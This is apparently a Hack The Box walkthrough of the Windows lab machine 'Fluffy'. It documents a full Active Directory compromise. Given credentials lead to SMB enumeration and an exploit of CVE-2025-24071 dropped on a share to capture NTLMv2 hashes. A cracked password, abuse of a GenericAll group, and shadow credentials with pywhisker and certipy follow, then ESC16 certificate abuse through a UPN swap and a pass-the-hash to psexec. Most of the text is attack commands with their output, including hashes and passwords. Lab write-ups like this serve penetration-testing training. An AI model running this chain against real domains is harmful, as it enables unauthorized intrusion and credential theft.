Fluffy Easy Machine - Hack the Box

Information

Fluffy Machine is a Easy-level Windows machine from Season 8.
As is common in real life Windows pentests, you will start this box with credentials for the following account:
j.fleischman / J0elTHEM4n1990!

Tools

• nmap
• smbclient
• bloodhound
• pywhisker
• evil-winrm
• impacket
• hashcat
• ntpupdate

In some of the next steps we may get a “Clock skew too great” error. This is just because the difference between the time of the target machine and our machine, this can cause some troubles to communicate and to do some auth techniques.
To resolve this we should run the next command:

ntpdate 10.10.11.69

Step by step

1. Start with Nmap scan for open ports and services:

   nmap -T4 -p- -v -A -oX -P0 fluffy_tcp.scan 10.10.11.69 --webxml
   

   We found many open ports, the DC name and the domain name: FLUFFY.HTB, DC01.FLUFFY.HTB

2. Samba share listing:

   smbclient -L //10.10.11.69 -U j.fleischman --password=J0elTHEM4n1990!
   

   Sharename       Type      Comment
   ---------       ----      -------
   ADMIN$          Disk      Remote Admin
   C$              Disk      Default share
   IPC$            IPC       Remote IPC
   IT              Disk
   NETLOGON        Disk      Logon server share
   SYSVOL          Disk      Logon server share
   

   If we try to access to IT shared folder we would see the following content:

   smb: \> ls
   .                                   D        0  Mon May 19 11:27:02 2025
   ..                                  D        0  Mon May 19 11:27:02 2025
   Everything-1.4.1.1026.x64           D        0  Fri Apr 18 12:08:44 2025
   Everything-1.4.1.1026.x64.zip       A  1827464  Fri Apr 18 12:04:05 2025
   KeePass-2.58                        D        0  Fri Apr 18 12:08:38 2025
   KeePass-2.58.zip                    A  3225346  Fri Apr 18 12:03:17 2025
   Upgrade_Notice.pdf                  A   169963  Sat May 17 11:31:07 2025
   

3. After downloaded the shared folder content, we may notice the only interesting file is Upgrade_Notice.pdf. It contains a bunch of CVEs that are patched or will be patched on the target system.
   Investigating these CVEs, we found a particular one with a PoC: CVE-2025-24071.
   The only place where we can upload this PoC at the moment is the IT shared folder, so we can start trying uploading the exploit there.
   After a few seconds we would get many NTLMv2 hashes through our listener and one of them is for the user p.agila, so we got a new user:

   [+] Received SMB connection on Auth Capture Server!
   [SMB] NTLMv2-SSP Client     : 10.10.11.69
   [SMB] NTLMv2-SSP Username   : FLUFFY\p.agila
   [SMB] NTLMv2-SSP Hash       : p.agila::FLUFFY:691bad4c448506e3:e66386e1f140e4643879060a39bf8bde:010100000000000000d0e16df9ccdb0128177e422c036a6b000000000200120057004f0052004b00470052004f00550050000100120057004f0052004b00470052004f00550050000400120057004f0052004b00470052004f00550050000300120057004f0052004b00470052004f00550050000700080000d0e16df9ccdb0106000400020000000800300030000000000000000100000000200000fc3eea764d866a190d200f9ecc9461765e70fea7277bfbeed156dac1f45404ca0a001000000000000000000000000000000000000900220063006900660073002f00310030002e00310030002e00310034002e003200320035000000000000000000
   

   Then we can attempt to crack the hash with hashcat: p.agila:prometheusx-303.
   One thing we may notice is that none of the two accounts we have, has permissions to remote access, so we need to continue exploring our options.

4. Bloodhound recopilation:

   bloodhound-python -d FLUFFY.HTB -u j.fleischman -p "J0elTHEM4n1990!" -gc dc01.fluffy.htb -c all -ns 10.10.11.69
   

   Looking the relationships for p.agila and j.fleischman the only with interesting ones is p.agila.
   The user p.agila is member of SERVICE ACCOUNT MANAGERS and this group has GenericAll to the SERVICE ACCOUNTS group and then SERVICE ACCOUNTS has GenericWrite relationship to ca_svc, ldap_svc and winrm_svc accounts.
   With the GenericAll relationship we can directly modify the group members so we can add p.agila to SERVICE ACCOUNTS and after that we can do a Shadow Credential attack to any of the previous mentioned accounts.

5. First, we need to add p.agila to SERVICE ACCOUNTS:

   net rpc group addmem "SERVICE ACCOUNTS" "p.agila" -U "FLUFFY.HTB"/"p.agila"%"prometheusx-303" -S "DC01.FLUFFY.HTB"
   

   Then we proceed with pywhisker, gettgtpkinit and getnthash to make the certificates, obtain the TGT and the NT hash respectively. The first account i tried to attack was winrm_svc just because it has remote access rights so then i can attempt to do evil-winrm.

   pywhisker.py -d "fluffy.htb" -u "p.agila" -p "prometheusx-303" --target "winrm_svc" --action "add"
   

   gettgtpkinit -cert-pem oBwGyENT_cert.pem -key-pem oBwGyENT_priv.pem fluffy.htb/winrm_svc winrm_svc.ccache
   

   export KRB5CCNAME=winrm_svc.ccache
   

   getnthash -key 3ccd6794d17d1ac416725120643c2d0867858e44556de69ad8854da2d0b0f627 fluffy.htb/winrm_svc
   

6. After obtained the NT hash we can attempt to remote access the system:

   evil-winrm -i 10.10.11.69 -u winrm_svc -H 33bd09dcd697600edf6b3a7af4875767
   

USER FLAG PWNED

Now, for the root flag i was looking around the system and the previous CVEs from the PDF but after some time i didn’t found anything useful. Then i tried to check if there are some certificates vulnerabilites because we can manipulate the ca_svc account but again certipy didn’t found anything.
In this labs the services accounts are usually there for a reason and with this idea and that the CVEs we found are from recently dates, i checked the certipy Github repository and found some recently changes. Comparing the Github version of certipy with the Kali one, i saw Kali didn’t updated it from their repos.
After downloaded certipy directly from Github repository and checking again if there is any vulnerables certificates, this time i found one.
This newer discover is documented in certipy wiki: ESC16: Security Extension Disabled on CA (Globally).
Following the steps documented in the wiki we should get the Administrator hash.

1. This step is not required if we previously did the User step 5 but with the ca_svc account and we already have the ca_svc.ccache and the NT hash.

   certipy shadow -u 'p.agila@fluffy.htb' -p 'prometheusx-303' -dc-ip '10.10.11.69' -account 'ca_svc' auto
   

   [*] Saving credential cache to 'ca_svc.ccache'
   File 'ca_svc.ccache' already exists. Overwrite? (y/n - saying no will save with a unique filename): y
   [*] Wrote credential cache to 'ca_svc.ccache'
   [*] Trying to retrieve NT hash for 'ca_svc'
   [*] Restoring the old Key Credentials for 'ca_svc'
   [*] Successfully restored the old Key Credentials for 'ca_svc'
   [*] NT hash for 'ca_svc': ca0f4f9e9eb8a092addf53bb03fc98c8
   

   export KRB5CCNAME=ca_svc.ccache
   

2. certipy-ad find -vulnerable -u ca_svc@fluffy.htb -hashes ca0f4f9e9eb8a092addf53bb03fc98c8 -dc-ip 10.10.11.69 -stdout
   

   Certificate Authorities
   0
   CA Name                             : fluffy-DC01-CA
   DNS Name                            : DC01.fluffy.htb
   Certificate Subject                 : CN=fluffy-DC01-CA, DC=fluffy, DC=htb
   Certificate Serial Number           : 3670C4A715B864BB497F7CD72119B6F5
   Certificate Validity Start          : 2025-04-17 16:00:16+00:00
   Certificate Validity End            : 3024-04-17 16:11:16+00:00
   Web Enrollment
     HTTP
      Enabled                         : False
     HTTPS
      Enabled                         : False
   User Specified SAN                  : Disabled
   Request Disposition                 : Issue
   Enforce Encryption for Requests     : Enabled
   Active Policy                       : CertificateAuthority_MicrosoftDefault.Policy
   Disabled Extensions                 : 1.3.6.1.4.1.311.25.2
   Permissions
      Owner                             : FLUFFY.HTB\Administrators
      Access Rights
        ManageCa                        : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
                                          FLUFFY.HTB\Administrators
        ManageCertificates              : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
                                          FLUFFY.HTB\Administrators
        Enroll                          : FLUFFY.HTB\Cert Publishers
   [!] Vulnerabilities
      ESC16                             : Security Extension is disabled.
   [*] Remarks
      ESC16                             : Other prerequisites may be required for this to be exploitable. See the wiki for more details.
   Certificate Templates                   : [!] Could not find any certificate templates
   

3. Read initial UPN of the victim account

   certipy account -u 'p.agila@fluffy.htb' -p 'prometheusx-303' -dc-ip '10.10.11.69' -user 'ca_svc' read
   

   [*] Reading attributes for 'ca_svc':
    cn                                  : certificate authority service
    distinguishedName                   : CN=certificate authority service,CN=Users,DC=fluffy,DC=htb
    name                                : certificate authority service
    objectSid                           : S-1-5-21-497550768-2797716248-2627064577-1103
    sAMAccountName                      : ca_svc
    servicePrincipalName                : ADCS/ca.fluffy.htb
    userPrincipalName                   : ca_svc@fluffy.htb
    userAccountControl                  : 66048
    whenCreated                         : 2025-04-17T16:07:50+00:00
    whenChanged                         : 2025-05-25T22:30:39+00:00
   

4. Update the victim account’s UPN to the target administrator’s sAMAccountName

   certipy account -u 'p.agila@fluffy.htb' -p 'prometheusx-303' -dc-ip '10.10.11.69' -upn 'administrator' -user 'ca_svc' update
   

   [*] Updating user 'ca_svc':
    userPrincipalName                   : administrator
   [*] Successfully updated 'ca_svc'
   

5. Request a certificate as the “victim” user from any suitable client authentication template (e.g., “User”) on the ESC16-vulnerable CA

   certipy req -k -dc-ip '10.10.11.69' -target 'DC01.FLUFFY.HTB' -ca 'fluffy-DC01-CA' -template 'User'
   

   [!] DC host (-dc-host) not specified and Kerberos authentication is used. This might fail
   [*] Requesting certificate via RPC
   [*] Request ID is 16
   [*] Successfully requested certificate
   [*] Got certificate with UPN 'administrator'
   [*] Certificate has no object SID
   [*] Try using -sid to set the object SID or see the wiki for more details
   [*] Saving certificate and private key to 'administrator.pfx'
   File 'administrator.pfx' already exists. Overwrite? (y/n - saying no will save with a unique filename): y
   [*] Wrote certificate and private key to 'administrator.pfx'
   

6. Revert the “victim” account’s UPN.

   certipy account -u 'p.agila@fluffy.htb' -p 'prometheusx-303' -dc-ip '10.10.11.69' -upn 'ca_svc@fluffy.htb' -user 'ca_svc' update
   

   [*] Updating user 'ca_svc':
    userPrincipalName                   : ca_svc@fluffy.htb
   [*] Successfully updated 'ca_svc'
   

7. Authenticate as the target administrator.

   certipy auth -dc-ip '10.10.11.69' -pfx 'administrator.pfx' -username 'administrator' -domain 'fluffy.htb'
   

   [*] Certificate identities:
   [*]     SAN UPN: 'administrator'
   [*] Using principal: 'administrator@fluffy.htb'
   [*] Trying to get TGT...
   [*] Got TGT
   [*] Saving credential cache to 'administrator.ccache'
   File 'administrator.ccache' already exists. Overwrite? (y/n - saying no will save with a unique filename): y
   [*] Wrote credential cache to 'administrator.ccache'
   [*] Trying to retrieve NT hash for 'administrator'
   [*] Got hash for 'administrator@fluffy.htb': aad3b435b51404eeaad3b435b51404ee:8da83a3fa618b6e3a00e93f676c92a6e
   

8. Now with the Administrator hash, we can simply do a Pass the Hash:

   impacket-psexec -hashes aad3b435b51404eeaad3b435b51404ee:8da83a3fa618b6e3a00e93f676c92a6e Administrator@10.10.11.69
   

SYSTEM FLAG PWNED